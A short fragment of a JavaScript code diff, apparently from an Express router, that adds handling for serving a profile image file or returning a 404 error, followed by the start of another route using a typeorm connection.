+ matchingFile = candidate; + break; + } + } + + if (!matchingFile) { + return res.status(404).json({ error: 'Profile image not found' }); + } + + return res.sendFile(matchingFile); + } catch (err) { + next(err); + } +}) + router.get('/', async (req, res, next) => { const mongoConnection = typeorm.getConnection('mysql')